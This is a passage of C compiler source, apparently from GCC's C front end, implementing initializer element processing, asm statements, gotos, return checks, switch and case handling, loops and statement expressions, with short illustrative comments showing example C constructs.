directly output as a constructor. */
{
constructor_bit_index = DECL_SIZE (constructor_fields);
constructor_unfilled_fields = DECL_CHAIN (constructor_fields);
}
constructor_fields = NULL_TREE;
}
else if (TREE_CODE (constructor_type) == ARRAY_TYPE)
{
tree elttype = TYPE_MAIN_VARIANT (TREE_TYPE (constructor_type));
enum tree_code eltcode = TREE_CODE (elttype);
/* Accept a string constant to initialize a subarray. */
if (value.value != NULL_TREE
&& eltcode == ARRAY_TYPE
&& INTEGRAL_TYPE_P (TREE_TYPE (elttype))
&& string_flag)
value.value = orig_value;
/* Otherwise, if we have come to a subaggregate,
and we don't have an element of its type, push into it. */
else if (value.value != NULL_TREE
&& initialize_elementwise_p (elttype, value.value))
{
push_init_level (loc, 1, braced_init_obstack);
continue;
}
if (constructor_max_index != NULL_TREE
&& (tree_int_cst_lt (constructor_max_index, constructor_index)
|| integer_all_onesp (constructor_max_index)))
{
pedwarn_init (loc, 0,
"excess elements in array initializer");
break;
}
/* Now output the actual element. */
if (value.value)
{
push_array_bounds (tree_to_uhwi (constructor_index));
output_init_element (loc, value.value, value.original_type,
strict_string, elttype,
constructor_index, true, implicit,
braced_init_obstack);
RESTORE_SPELLING_DEPTH (constructor_depth);
}
constructor_index
= size_binop_loc (input_location, PLUS_EXPR,
constructor_index, bitsize_one_node);
if (!value.value)
/* If we are doing the bookkeeping for an element that was
directly output as a constructor, we must update
constructor_unfilled_index. */
constructor_unfilled_index = constructor_index;
}
else if (gnu_vector_type_p (constructor_type))
{
tree elttype = TYPE_MAIN_VARIANT (TREE_TYPE (constructor_type));
/* Do a basic check of initializer size. Note that vectors
always have a fixed size derived from their type. */
if (tree_int_cst_lt (constructor_max_index, constructor_index))
{
pedwarn_init (loc, 0,
"excess elements in vector initializer");
break;
}
/* Now output the actual element. */
if (value.value)
{
if (TREE_CODE (value.value) == VECTOR_CST)
elttype = TYPE_MAIN_VARIANT (constructor_type);
output_init_element (loc, value.value, value.original_type,
strict_string, elttype,
constructor_index, true, implicit,
braced_init_obstack);
}
constructor_index
= size_binop_loc (input_location,
PLUS_EXPR, constructor_index, bitsize_one_node);
if (!value.value)
/* If we are doing the bookkeeping for an element that was
directly output as a constructor, we must update
constructor_unfilled_index. */
constructor_unfilled_index = constructor_index;
}
/* Handle the sole element allowed in a braced initializer
for a scalar variable. */
else if (constructor_type != error_mark_node
&& constructor_fields == NULL_TREE)
{
pedwarn_init (loc, 0,
"excess elements in scalar initializer");
break;
}
else
{
if (value.value)
output_init_element (loc, value.value, value.original_type,
strict_string, constructor_type,
NULL_TREE, true, implicit,
braced_init_obstack);
constructor_fields = NULL_TREE;
}
/* Handle range initializers either at this level or anywhere higher
in the designator stack. */
if (constructor_range_stack)
{
struct constructor_range_stack *p, *range_stack;
int finish = 0;
range_stack = constructor_range_stack;
constructor_range_stack = 0;
while (constructor_stack != range_stack->stack)
{
gcc_assert (constructor_stack->implicit);
process_init_element (loc,
pop_init_level (loc, 1,
braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
}
for (p = range_stack;
!p->range_end || tree_int_cst_equal (p->index, p->range_end);
p = p->prev)
{
gcc_assert (constructor_stack->implicit);
process_init_element (loc,
pop_init_level (loc, 1,
braced_init_obstack,
last_init_list_comma),
true, braced_init_obstack);
}
p->index = size_binop_loc (input_location,
PLUS_EXPR, p->index, bitsize_one_node);
if (tree_int_cst_equal (p->index, p->range_end) && !p->prev)
finish = 1;
while (1)
{
constructor_index = p->index;
constructor_fields = p->fields;
if (finish && p->range_end && p->index == p->range_start)
{
finish = 0;
p->prev = 0;
}
p = p->next;
if (!p)
break;
finish_implicit_inits (loc, braced_init_obstack);
push_init_level (loc, 2, braced_init_obstack);
p->stack = constructor_stack;
if (p->range_end && tree_int_cst_equal (p->index, p->range_end))
p->index = p->range_start;
}
if (!finish)
constructor_range_stack = range_stack;
continue;
}
break;
}
constructor_range_stack = 0;
}
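/* Illustrative only: a partly-braced initializer such as

  struct pt { int x, y; };
  struct line { struct pt a, b; } l = { 1, 2, 3, 4 };

exercises the implicit levels above: a level is pushed for L.A to
consume 1 and 2, popped when A is full, and pushed again for L.B. */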
/* Build a complete asm-statement, whose components are IS_VOLATILE
(true if the asm was qualified with 'volatile') and ARGS (represented
using an ASM_EXPR node). */
tree
build_asm_stmt (bool is_volatile, tree args)
{
if (is_volatile)
ASM_VOLATILE_P (args) = 1;
return add_stmt (args);
}
/* Build an asm-expr, whose components are a STRING, some OUTPUTS,
some INPUTS, and some CLOBBERS. The latter three may be NULL.
SIMPLE indicates whether there was anything at all after the
string in the asm expression -- asm("blah") and asm("blah" : )
are subtly different. We use an ASM_EXPR node to represent this.
LOC is the location of the asm, and IS_INLINE says whether this
is asm inline. */
tree
build_asm_expr (location_t loc, tree string, tree outputs, tree inputs,
tree clobbers, tree labels, bool simple, bool is_inline)
{
tree tail;
tree args;
int i;
const char *constraint;
const char **oconstraints;
bool allows_mem, allows_reg, is_inout;
int ninputs, noutputs;
ninputs = list_length (inputs);
noutputs = list_length (outputs);
oconstraints = (const char **) alloca (noutputs * sizeof (const char *));
string = resolve_asm_operand_names (string, outputs, inputs, labels);
/* Remove output conversions that change the type but not the mode. */
for (i = 0, tail = outputs; tail; ++i, tail = TREE_CHAIN (tail))
{
tree output = TREE_VALUE (tail);
output = c_fully_fold (output, false, NULL, true);
/* ??? Really, this should not be here. Users should be using a
proper lvalue, dammit. But there's a long history of using casts
in the output operands. In cases like longlong.h, this becomes a
primitive form of typechecking -- if the cast can be removed, then
the output operand had a type of the proper width; otherwise we'll
get an error. Gross, but ... */
STRIP_NOPS (output);
if (!lvalue_or_else (loc, output, lv_asm))
output = error_mark_node;
if (output != error_mark_node
&& (TREE_READONLY (output)
|| TYPE_READONLY (TREE_TYPE (output))
|| (RECORD_OR_UNION_TYPE_P (TREE_TYPE (output))
&& C_TYPE_FIELDS_READONLY (TREE_TYPE (output)))))
readonly_error (loc, output, lv_asm);
constraint = TREE_STRING_POINTER (TREE_VALUE (TREE_PURPOSE (tail)));
oconstraints[i] = constraint;
if (parse_output_constraint (&constraint, i, ninputs, noutputs,
&allows_mem, &allows_reg, &is_inout))
{
/* If the operand is going to end up in memory,
mark it addressable. */
if (!allows_reg && !c_mark_addressable (output))
output = error_mark_node;
if (!(!allows_reg && allows_mem)
&& output != error_mark_node
&& VOID_TYPE_P (TREE_TYPE (output)))
{
error_at (loc, "invalid use of void expression");
output = error_mark_node;
}
}
else
output = error_mark_node;
TREE_VALUE (tail) = output;
}
for (i = 0, tail = inputs; tail; ++i, tail = TREE_CHAIN (tail))
{
tree input;
constraint = TREE_STRING_POINTER (TREE_VALUE (TREE_PURPOSE (tail)));
input = TREE_VALUE (tail);
if (parse_input_constraint (&constraint, i, ninputs, noutputs, 0,
oconstraints, &allows_mem, &allows_reg))
{
/* If the operand is going to end up in memory,
mark it addressable. */
if (!allows_reg && allows_mem)
{
input = c_fully_fold (input, false, NULL, true);
/* Strip the nops as we allow this case. FIXME, this really
should be rejected or made deprecated. */
STRIP_NOPS (input);
if (!c_mark_addressable (input))
input = error_mark_node;
}
else
{
struct c_expr expr;
memset (&expr, 0, sizeof (expr));
expr.value = input;
expr = convert_lvalue_to_rvalue (loc, expr, true, false);
input = c_fully_fold (expr.value, false, NULL);
if (input != error_mark_node && VOID_TYPE_P (TREE_TYPE (input)))
{
error_at (loc, "invalid use of void expression");
input = error_mark_node;
}
}
}
else
input = error_mark_node;
TREE_VALUE (tail) = input;
}
/* ASMs with labels cannot have outputs. This should have been
enforced by the parser. */
gcc_assert (outputs == NULL || labels == NULL);
args = build_stmt (loc, ASM_EXPR, string, outputs, inputs, clobbers, labels);
/* asm statements without outputs, including simple ones, are treated
as volatile. */
ASM_INPUT_P (args) = simple;
ASM_VOLATILE_P (args) = (noutputs == 0);
ASM_INLINE_P (args) = is_inline;
return args;
}
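/* Illustrative only: an extended asm such as

  int dst;
  int src = 1;
  asm ("mov %1, %0" : "=r" (dst) : "r" (src));

reaches build_asm_expr with one output and one input; because it has an
output it is not implicitly volatile, and because it has colons it is
not SIMPLE. */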
/* Generate a goto statement to LABEL. LOC is the location of the
GOTO. */
tree
c_finish_goto_label (location_t loc, tree label)
{
tree decl = lookup_label_for_goto (loc, label);
if (!decl)
return NULL_TREE;
TREE_USED (decl) = 1;
{
add_stmt (build_predict_expr (PRED_GOTO, NOT_TAKEN));
tree t = build1 (GOTO_EXPR, void_type_node, decl);
SET_EXPR_LOCATION (t, loc);
return add_stmt (t);
}
}
/* Generate a computed goto statement to EXPR. LOC is the location of
the GOTO. */
tree
c_finish_goto_ptr (location_t loc, tree expr)
{
tree t;
pedwarn (loc, OPT_Wpedantic, "ISO C forbids %<goto *expr;%>");
expr = c_fully_fold (expr, false, NULL);
expr = convert (ptr_type_node, expr);
t = build1 (GOTO_EXPR, void_type_node, expr);
SET_EXPR_LOCATION (t, loc);
return add_stmt (t);
}
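/* Illustrative only: this handles the GNU computed-goto extension, e.g.

  static void *tbl[] = { &&op_add, &&op_sub };
  goto *tbl[opcode];

where the target expression is folded and converted to ptr_type_node
above. */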
/* Generate a C `return' statement. RETVAL is the expression for what
to return, or a null pointer for `return;' with no value. LOC is
the location of the return statement, or the location of the expression,
if the statement has one. If ORIGTYPE is not NULL_TREE, it
is the original type of RETVAL. */
tree
c_finish_return (location_t loc, tree retval, tree origtype)
{
tree valtype = TREE_TYPE (TREE_TYPE (current_function_decl)), ret_stmt;
bool no_warning = false;
bool npc = false;
/* Use the expansion point to handle cases such as returning NULL
in a function returning void. */
location_t xloc = expansion_point_location_if_in_system_header (loc);
if (TREE_THIS_VOLATILE (current_function_decl))
warning_at (xloc, 0,
"function declared %<noreturn%> has a %<return%> statement");
if (retval)
{
tree semantic_type = NULL_TREE;
npc = null_pointer_constant_p (retval);
if (TREE_CODE (retval) == EXCESS_PRECISION_EXPR)
{
semantic_type = TREE_TYPE (retval);
retval = TREE_OPERAND (retval, 0);
}
retval = c_fully_fold (retval, false, NULL);
if (semantic_type
&& valtype != NULL_TREE
&& TREE_CODE (valtype) != VOID_TYPE)
retval = build1 (EXCESS_PRECISION_EXPR, semantic_type, retval);
}
if (!retval)
{
current_function_returns_null = 1;
if ((warn_return_type >= 0 || flag_isoc99)
&& valtype != NULL_TREE && TREE_CODE (valtype) != VOID_TYPE)
{
bool warned_here;
if (flag_isoc99)
warned_here = pedwarn
(loc, warn_return_type >= 0 ? OPT_Wreturn_type : 0,
"%<return%> with no value, in function returning non-void");
else
warned_here = warning_at
(loc, OPT_Wreturn_type,
"%<return%> with no value, in function returning non-void");
no_warning = true;
if (warned_here)
inform (DECL_SOURCE_LOCATION (current_function_decl),
"declared here");
}
}
else if (valtype == NULL_TREE || TREE_CODE (valtype) == VOID_TYPE)
{
current_function_returns_null = 1;
bool warned_here;
if (TREE_CODE (TREE_TYPE (retval)) != VOID_TYPE)
warned_here = pedwarn
(xloc, warn_return_type >= 0 ? OPT_Wreturn_type : 0,
"%<return%> with a value, in function returning void");
else
warned_here = pedwarn
(xloc, OPT_Wpedantic, "ISO C forbids "
"%<return%> with expression, in function returning void");
if (warned_here)
inform (DECL_SOURCE_LOCATION (current_function_decl),
"declared here");
}
else
{
tree t = convert_for_assignment (loc, UNKNOWN_LOCATION, valtype,
retval, origtype, ic_return,
npc, NULL_TREE, NULL_TREE, 0);
tree res = DECL_RESULT (current_function_decl);
tree inner;
bool save;
current_function_returns_value = 1;
if (t == error_mark_node)
return NULL_TREE;
save = in_late_binary_op;
if (TREE_CODE (TREE_TYPE (res)) == BOOLEAN_TYPE
|| TREE_CODE (TREE_TYPE (res)) == COMPLEX_TYPE
|| (TREE_CODE (TREE_TYPE (t)) == REAL_TYPE
&& (TREE_CODE (TREE_TYPE (res)) == INTEGER_TYPE
|| TREE_CODE (TREE_TYPE (res)) == ENUMERAL_TYPE)
&& sanitize_flags_p (SANITIZE_FLOAT_CAST)))
in_late_binary_op = true;
inner = t = convert (TREE_TYPE (res), t);
in_late_binary_op = save;
/* Strip any conversions, additions, and subtractions, and see if
we are returning the address of a local variable. Warn if so. */
while (1)
{
switch (TREE_CODE (inner))
{
CASE_CONVERT:
case NON_LVALUE_EXPR:
case PLUS_EXPR:
case POINTER_PLUS_EXPR:
inner = TREE_OPERAND (inner, 0);
continue;
case MINUS_EXPR:
/* If the second operand of the MINUS_EXPR has a pointer
type (or is converted from it), this may be valid, so
don't give a warning. */
{
tree op1 = TREE_OPERAND (inner, 1);
while (!POINTER_TYPE_P (TREE_TYPE (op1))
&& (CONVERT_EXPR_P (op1)
|| TREE_CODE (op1) == NON_LVALUE_EXPR))
op1 = TREE_OPERAND (op1, 0);
if (POINTER_TYPE_P (TREE_TYPE (op1)))
break;
inner = TREE_OPERAND (inner, 0);
continue;
}
case ADDR_EXPR:
inner = TREE_OPERAND (inner, 0);
while (REFERENCE_CLASS_P (inner)
&& !INDIRECT_REF_P (inner))
inner = TREE_OPERAND (inner, 0);
if (DECL_P (inner)
&& !DECL_EXTERNAL (inner)
&& !TREE_STATIC (inner)
&& DECL_CONTEXT (inner) == current_function_decl
&& POINTER_TYPE_P (TREE_TYPE (TREE_TYPE (current_function_decl))))
{
if (TREE_CODE (inner) == LABEL_DECL)
warning_at (loc, OPT_Wreturn_local_addr,
"function returns address of label");
else
{
warning_at (loc, OPT_Wreturn_local_addr,
"function returns address of local variable");
tree zero = build_zero_cst (TREE_TYPE (res));
t = build2 (COMPOUND_EXPR, TREE_TYPE (res), t, zero);
}
}
break;
default:
break;
}
break;
}
retval = build2 (MODIFY_EXPR, TREE_TYPE (res), res, t);
SET_EXPR_LOCATION (retval, loc);
if (warn_sequence_point)
verify_sequence_points (retval);
}
ret_stmt = build_stmt (loc, RETURN_EXPR, retval);
TREE_NO_WARNING (ret_stmt) |= no_warning;
return add_stmt (ret_stmt);
}
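/* Illustrative only: the -Wreturn-local-addr logic above catches e.g.

  int *f (void) { int x = 0; return &x; }

and, besides warning, rewrites the returned value to a null constant
via the COMPOUND_EXPR built above. */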
struct c_switch {
/* The SWITCH_EXPR being built. */
tree switch_expr;
/* The original type of the testing expression, i.e. before the
default conversion is applied. */
tree orig_type;
/* A splay-tree mapping the low element of a case range to the high
element, or NULL_TREE if there is no high element. Used to
determine whether or not a new case label duplicates an old case
label. We need a tree, rather than simply a hash table, because
of the GNU case range extension. */
splay_tree cases;
/* The bindings at the point of the switch. This is used for
warnings crossing decls when branching to a case label. */
struct c_spot_bindings *bindings;
/* The next node on the stack. */
struct c_switch *next;
/* Remember whether the controlling expression had boolean type
before integer promotions for the sake of -Wswitch-bool. */
bool bool_cond_p;
};
/* A stack of the currently active switch statements. The innermost
switch statement is on the top of the stack. There is no need to
mark the stack for garbage collection because it is only active
during the processing of the body of a function, and we never
collect at that point. */
struct c_switch *c_switch_stack;
/* Start a C switch statement, testing expression EXP. Return the new
SWITCH_EXPR. SWITCH_LOC is the location of the `switch'.
SWITCH_COND_LOC is the location of the switch's condition.
EXPLICIT_CAST_P is true if the expression EXP has an explicit cast. */
tree
c_start_case (location_t switch_loc,
location_t switch_cond_loc,
tree exp, bool explicit_cast_p)
{
tree orig_type = error_mark_node;
bool bool_cond_p = false;
struct c_switch *cs;
if (exp != error_mark_node)
{
orig_type = TREE_TYPE (exp);
if (!INTEGRAL_TYPE_P (orig_type))
{
if (orig_type != error_mark_node)
{
error_at (switch_cond_loc, "switch quantity not an integer");
orig_type = error_mark_node;
}
exp = integer_zero_node;
}
else
{
tree type = TYPE_MAIN_VARIANT (orig_type);
tree e = exp;
/* Warn if the condition has boolean value. */
while (TREE_CODE (e) == COMPOUND_EXPR)
e = TREE_OPERAND (e, 1);
if ((TREE_CODE (type) == BOOLEAN_TYPE
|| truth_value_p (TREE_CODE (e)))
/* Explicit cast to int suppresses this warning. */
&& !(TREE_CODE (type) == INTEGER_TYPE
&& explicit_cast_p))
bool_cond_p = true;
if (!in_system_header_at (input_location)
&& (type == long_integer_type_node
|| type == long_unsigned_type_node))
warning_at (switch_cond_loc,
OPT_Wtraditional, "%<long%> switch expression not "
"converted to %<int%> in ISO C");
exp = c_fully_fold (exp, false, NULL);
exp = default_conversion (exp);
if (warn_sequence_point)
verify_sequence_points (exp);
}
}
/* Add this new SWITCH_EXPR to the stack. */
cs = XNEW (struct c_switch);
cs->switch_expr = build2 (SWITCH_EXPR, orig_type, exp, NULL_TREE);
SET_EXPR_LOCATION (cs->switch_expr, switch_loc);
cs->orig_type = orig_type;
cs->cases = splay_tree_new (case_compare, NULL, NULL);
cs->bindings = c_get_switch_bindings ();
cs->bool_cond_p = bool_cond_p;
cs->next = c_switch_stack;
c_switch_stack = cs;
return add_stmt (cs->switch_expr);
}
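/* Illustrative only: BOOL_COND_P set above drives -Wswitch-bool for

  switch (x == 0) { ... }

while an explicit cast to int, switch ((int) (x == 0)), suppresses
the warning. */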
/* Process a case label at location LOC. */
tree
do_case (location_t loc, tree low_value, tree high_value)
{
tree label = NULL_TREE;
if (low_value && TREE_CODE (low_value) != INTEGER_CST)
{
low_value = c_fully_fold (low_value, false, NULL);
if (TREE_CODE (low_value) == INTEGER_CST)
pedwarn (loc, OPT_Wpedantic,
"case label is not an integer constant expression");
}
if (high_value && TREE_CODE (high_value) != INTEGER_CST)
{
high_value = c_fully_fold (high_value, false, NULL);
if (TREE_CODE (high_value) == INTEGER_CST)
pedwarn (input_location, OPT_Wpedantic,
"case label is not an integer constant expression");
}
if (c_switch_stack == NULL)
{
if (low_value)
error_at (loc, "case label not within a switch statement");
else
error_at (loc, "%<default%> label not within a switch statement");
return NULL_TREE;
}
if (c_check_switch_jump_warnings (c_switch_stack->bindings,
EXPR_LOCATION (c_switch_stack->switch_expr),
loc))
return NULL_TREE;
label = c_add_case_label (loc, c_switch_stack->cases,
SWITCH_COND (c_switch_stack->switch_expr),
low_value, high_value);
if (label == error_mark_node)
label = NULL_TREE;
return label;
}
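/* Illustrative only: the GNU case-range extension is why CASES must map
a low bound to a high bound rather than hold single values:

  switch (c) { case 'a' ... 'z': return 1; }  */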
/* Finish the switch statement. TYPE is the original type of the
controlling expression of the switch, or NULL_TREE. */
void
c_finish_case (tree body, tree type)
{
struct c_switch *cs = c_switch_stack;
location_t switch_location;
SWITCH_BODY (cs->switch_expr) = body;
/* Emit warnings as needed. */
switch_location = EXPR_LOCATION (cs->switch_expr);
c_do_switch_warnings (cs->cases, switch_location,
type ? type : TREE_TYPE (cs->switch_expr),
SWITCH_COND (cs->switch_expr), cs->bool_cond_p);
if (c_switch_covers_all_cases_p (cs->cases, TREE_TYPE (cs->switch_expr)))
SWITCH_ALL_CASES_P (cs->switch_expr) = 1;
/* Pop the stack. */
c_switch_stack = cs->next;
splay_tree_delete (cs->cases);
c_release_switch_bindings (cs->bindings);
XDELETE (cs);
}
/* Emit an if statement. IF_LOCUS is the location of the 'if'. COND,
THEN_BLOCK and ELSE_BLOCK are expressions to be used; ELSE_BLOCK
may be null. */
void
c_finish_if_stmt (location_t if_locus, tree cond, tree then_block,
tree else_block)
{
tree stmt;
stmt = build3 (COND_EXPR, void_type_node, cond, then_block, else_block);
SET_EXPR_LOCATION (stmt, if_locus);
add_stmt (stmt);
}
/* Emit a general-purpose loop construct. START_LOCUS is the location of
the beginning of the loop. COND is the loop condition. COND_IS_FIRST
is false for DO loops. INCR is the FOR increment expression. BODY is
the statement controlled by the loop. BLAB is the break label. CLAB is
the continue label. Everything is allowed to be NULL.
COND_LOCUS is the location of the loop condition, INCR_LOCUS is the
location of the FOR increment expression. */
void
c_finish_loop (location_t start_locus, location_t cond_locus, tree cond,
location_t incr_locus, tree incr, tree body, tree blab,
tree clab, bool cond_is_first)
{
tree entry = NULL, exit = NULL, t;
/* If the condition is zero don't generate a loop construct. */
if (cond && integer_zerop (cond))
{
if (cond_is_first)
{
t = build_and_jump (&blab);
SET_EXPR_LOCATION (t, start_locus);
add_stmt (t);
}
}
else
{
tree top = build1 (LABEL_EXPR, void_type_node, NULL_TREE);
/* If we have an exit condition, then we build an IF with gotos either
out of the loop, or to the top of it. If there's no exit condition,
then we just build a jump back to the top. */
exit = build_and_jump (&LABEL_EXPR_LABEL (top));
if (cond && !integer_nonzerop (cond))
{
/* Canonicalize the loop condition to the end. This means
generating a branch to the loop condition. Reuse the
continue label, if possible. */
if (cond_is_first)
{
if (incr || !clab)
{
entry = build1 (LABEL_EXPR, void_type_node, NULL_TREE);
t = build_and_jump (&LABEL_EXPR_LABEL (entry));
}
else
t = build1 (GOTO_EXPR, void_type_node, clab);
SET_EXPR_LOCATION (t, start_locus);
add_stmt (t);
}
t = build_and_jump (&blab);
exit = fold_build3_loc (cond_is_first ? start_locus : input_location,
COND_EXPR, void_type_node, cond, exit, t);
}
else
{
/* For the backward-goto's location of an unconditional loop
use the beginning of the body, or, if there is none, the
top of the loop. */
location_t loc = EXPR_LOCATION (expr_first (body));
if (loc == UNKNOWN_LOCATION)
loc = start_locus;
SET_EXPR_LOCATION (exit, loc);
}
add_stmt (top);
}
if (body)
add_stmt (body);
if (clab)
add_stmt (build1 (LABEL_EXPR, void_type_node, clab));
if (incr)
{
if (MAY_HAVE_DEBUG_MARKER_STMTS && incr_locus != UNKNOWN_LOCATION)
{
t = build0 (DEBUG_BEGIN_STMT, void_type_node);
SET_EXPR_LOCATION (t, incr_locus);
add_stmt (t);
}
add_stmt (incr);
}
if (entry)
add_stmt (entry);
if (MAY_HAVE_DEBUG_MARKER_STMTS && cond_locus != UNKNOWN_LOCATION)
{
t = build0 (DEBUG_BEGIN_STMT, void_type_node);
SET_EXPR_LOCATION (t, cond_locus);
add_stmt (t);
}
if (exit)
add_stmt (exit);
if (blab)
add_stmt (build1 (LABEL_EXPR, void_type_node, blab));
}
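/* Illustrative only: for `while (cond) body' the function above emits
roughly

  goto test;
  top: body
  test: if (cond) goto top; else goto brk;
  brk: ;

i.e. the condition is canonicalized to the bottom of the loop so each
iteration costs a single conditional branch. */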
tree
c_finish_bc_stmt (location_t loc, tree *label_p, bool is_break)
{
bool skip;
tree label = *label_p;
/* In switch statements break is sometimes stylistically used after
a return statement. This can lead to spurious warnings about
control reaching the end of a non-void function when it is
inlined. Note that we are calling block_may_fallthru with
language specific tree nodes; this works because
block_may_fallthru returns true when given something it does not
understand. */
skip = !block_may_fallthru (cur_stmt_list);
if (!label)
{
if (!skip)
*label_p = label = create_artificial_label (loc);
}
else if (TREE_CODE (label) == LABEL_DECL)
;
else switch (TREE_INT_CST_LOW (label))
{
case 0:
if (is_break)
error_at (loc, "break statement not within loop or switch");
else
error_at (loc, "continue statement not within a loop");
return NULL_TREE;
case 1:
gcc_assert (is_break);
error_at (loc, "break statement used with OpenMP for loop");
return NULL_TREE;
case 2:
if (is_break)
error ("break statement within %<#pragma simd%> loop body");
else
error ("continue statement within %<#pragma simd%> loop body");
return NULL_TREE;
default:
gcc_unreachable ();
}
if (skip)
return NULL_TREE;
if (!is_break)
add_stmt (build_predict_expr (PRED_CONTINUE, NOT_TAKEN));
return add_stmt (build1 (GOTO_EXPR, void_type_node, label));
}
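/* Illustrative only: the block_may_fallthru check above means that in

  case 0: return 1; break;

the unreachable `break' emits no GOTO_EXPR, so no dead jump survives to
trigger the spurious warnings described above. */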
/* A helper routine for c_process_expr_stmt and c_finish_stmt_expr. */
static void
emit_side_effect_warnings (location_t loc, tree expr)
{
if (expr == error_mark_node)
;
else if (!TREE_SIDE_EFFECTS (expr))
{
if (!VOID_TYPE_P (TREE_TYPE (expr)) && !TREE_NO_WARNING (expr))
warning_at (loc, OPT_Wunused_value, "statement with no effect");
}
else if (TREE_CODE (expr) == COMPOUND_EXPR)
{
tree r = expr;
location_t cloc = loc;
while (TREE_CODE (r) == COMPOUND_EXPR)
{
if (EXPR_HAS_LOCATION (r))
cloc = EXPR_LOCATION (r);
r = TREE_OPERAND (r, 1);
}
if (!TREE_SIDE_EFFECTS (r)
&& !VOID_TYPE_P (TREE_TYPE (r))
&& !CONVERT_EXPR_P (r)
&& !TREE_NO_WARNING (r)
&& !TREE_NO_WARNING (expr))
warning_at (cloc, OPT_Wunused_value,
"right-hand operand of comma expression has no effect");
}
else
warn_if_unused_value (expr, loc);
}
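/* Illustrative only: `x == 1;' draws "statement with no effect", while
`f (), x == 1;' warns that the right-hand operand of the comma
expression has no effect. */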
/* Process an expression as if it were a complete statement. Emit
diagnostics, but do not call ADD_STMT. LOC is the location of the
statement. */
tree
c_process_expr_stmt (location_t loc, tree expr)
{
tree exprv;
if (!expr)
return NULL_TREE;
expr = c_fully_fold (expr, false, NULL);
if (warn_sequence_point)
verify_sequence_points (expr);
if (TREE_TYPE (expr) != error_mark_node
&& !COMPLETE_OR_VOID_TYPE_P (TREE_TYPE (expr))
&& TREE_CODE (TREE_TYPE (expr)) != ARRAY_TYPE)
error_at (loc, "expression statement has incomplete type");
/* If we're not processing a statement expression, warn about unused values.
Warnings for statement expressions will be emitted later, once we figure
out which is the result. */
if (!STATEMENT_LIST_STMT_EXPR (cur_stmt_list)
&& warn_unused_value)
emit_side_effect_warnings (EXPR_LOC_OR_LOC (expr, loc), expr);
exprv = expr;
while (TREE_CODE (exprv) == COMPOUND_EXPR)
exprv = TREE_OPERAND (exprv, 1);
while (CONVERT_EXPR_P (exprv))
exprv = TREE_OPERAND (exprv, 0);
if (DECL_P (exprv)
|| handled_component_p (exprv)
|| TREE_CODE (exprv) == ADDR_EXPR)
mark_exp_read (exprv);
/* If the expression is a decl or a constant, to which we cannot
assign a line number, wrap it in a no-op NOP_EXPR that can carry
the location. */
if (DECL_P (expr) || CONSTANT_CLASS_P (expr))
{
expr = build1 (NOP_EXPR, TREE_TYPE (expr), expr);
SET_EXPR_LOCATION (expr, loc);
}
return expr;
}
/* Emit an expression as a statement. LOC is the location of the
expression. */
tree
c_finish_expr_stmt (location_t loc, tree expr)
{
if (expr)
return add_stmt (c_process_expr_stmt (loc, expr));
else
return NULL;
}
/* Do the opposite and emit a statement as an expression. To begin,
create a new binding level and return it. */
tree
c_begin_stmt_expr (void)
{
tree ret;
/* We must force a BLOCK for this level so that, if it is not expanded
later, there is a way to turn off the entire subtree of blocks that
are contained in it. */
keep_next_level ();
ret = c_begin_compound_stmt (true);
c_bindings_start_stmt_expr (c_switch_stack == NULL
? NULL
: c_switch_stack->bindings);
/* Mark the current statement list as belonging to a statement expression. */
STATEMENT_LIST_STMT_EXPR (ret) = 1;
return ret;
}
/* LOC is the location of the compound statement to which this body
belongs. */
tree
c_finish_stmt_expr (location_t loc, tree body)
{
tree last, type, tmp, val;
tree *last_p;
body = c_end_compound_stmt (loc, body, true);
c_bindings_end_stmt_expr (c_switch_stack == NULL
? NULL
: c_switch_stack->bindings);
/* Locate the last statement in BODY. See c_end_compound_stmt
about always returning a BIND_EXPR. */
last_p = &BIND_EXPR_BODY (body);
last = BIND_EXPR_BODY (body);
continue_searching:
if (TREE_CODE (last) == STATEMENT_LIST)
{
tree_stmt_iterator l = tsi_last (last);
while (!tsi_end_p (l) && TREE_CODE (tsi_stmt (l)) == DEBUG_BEGIN_STMT)
tsi_prev (&l);
/* This can happen with degenerate cases like ({ }). No value. */
if (tsi_end_p (l))
return body;
/* If we're supposed to generate side effects warnings, process
all of the statements except the last. */
if (warn_unused_value)
{
for (tree_stmt_iterator i = tsi_start (last);
tsi_stmt (i) != tsi_stmt (l); tsi_next (&i))
{
location_t tloc;
tree t = tsi_stmt (i);
tloc = EXPR_HAS_LOCATION (t) ? EXPR_LOCATION (t) : loc;
emit_side_effect_warnings (tloc, t);
}
}
last_p = tsi_stmt_ptr (l);
last = *last_p;
}
/* If the end of the list is exception related, then the list was split
by a call to push_cleanup. Continue searching. */
if (TREE_CODE (last) == TRY_FINALLY_EXPR
|| TREE_CODE (last) == TRY_CATCH_EXPR)
{
last_p = &TREE_OPERAND (last, 0);
last = *last_p;
goto continue_searching;
}
if (last == error_mark_node)
return last;
/* In the case that the BIND_EXPR is not necessary, return the
expression out from inside it. */
if ((last == BIND_EXPR_BODY (body)
/* Skip nested debug stmts. */
|| last == expr_first (BIND_EXPR_BODY (body)))
&& BIND_EXPR_VARS (body) == NULL)
{
/* Even if this looks constant, do not allow it in a constant
expression. */
last = c_wrap_maybe_const (last, true);
/* Do not warn if the return value of a statement expression is
unused. */
TREE_NO_WARNING (last) = 1;
return last;
}
/* Extract the type of said expression. */
type = TREE_TYPE (last);
/* If we're not returning a value at all, then the BIND_EXPR that
we already have is a fine expression to return. */
if (!type || VOID_TYPE_P (type))
return body;
/* Now that we've located the expression containing the value, it seems
silly to make voidify_wrapper_expr repeat the process. Create a
temporary of the appropriate type and stick it in a TARGET_EXPR. */
tmp = create_tmp_var_raw (type);
/* Unwrap a no-op NOP_EXPR as added by c_finish_expr_stmt. This avoids
tree_expr_nonnegative_p giving up immediately. */
val = last;
if (TREE_CODE (val) == NOP_EXPR
&& TREE_TYPE (val) == TREE_TYPE (TREE_OPERAND (val, 0)))
val = TREE_OPERAND (val, 0);
*last_p = build2 (MODIFY_EXPR, void_type_node, tmp, val);
SET_EXPR_LOCATION (*last_p, EXPR_LOCATION (last));
{
tree t = build4 (TARGET_EXPR, type, tmp, body, NULL_TREE, NULL_TREE);
SET_EXPR_LOCATION (t, loc);
return t;
}
}
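/* Illustrative only: a statement expression such as

  int y = ({ int t = f (); t + 1; });

ends here with `t + 1' as LAST; the code above assigns it to a
temporary and wraps the BIND_EXPR in a TARGET_EXPR of type int. */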
/* Begin and end compound statements. This is as simple as pushing
and popping new statement lists from the tree. */
tree
c_begin_compound_stmt (bool do_scope)
{
tree stmt = push_stmt_list ();
if (do_scope)
push_scope ();
return stmt;
}
/* End a compound statement. STMT is the statement. LOC is the
location of the compound statement; this is usually the location
of the opening brace. */
tree
c_end_compound_stmt (location_t loc, tree stmt, bool do_scope)
{
